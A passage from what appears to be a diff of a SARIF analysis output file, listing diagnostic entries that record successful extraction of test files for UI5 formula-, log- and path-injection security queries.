"js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : 
"none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 153 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 154 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + 
"index" : 155 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 156 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 157 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 158 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 159 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 160 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 161 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 162 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + 
}, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 170 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 171 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 172 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 173 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", 
+ "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 174 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 175 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 176 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 177 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + 
"descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 178 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 179 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 180 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 181 + } + } + } ], + "message" : { + "text" : "" + }, 
+ "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 182 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 183 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 184 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + 
"index" : 185 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 186 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 187 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 188 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 189 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 190 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 191 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 192 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 193 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 194 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 195 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 196 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + 
"locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 197 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 198 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 199 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/utils/CustomLogListener.js", + "uriBaseId" : "%SRCROOT%", + "index" : 200 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : 
{ + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 201 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 202 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 203 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 204 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + 
"properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 205 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 206 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 207 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 208 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + 
} + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 209 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 210 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : 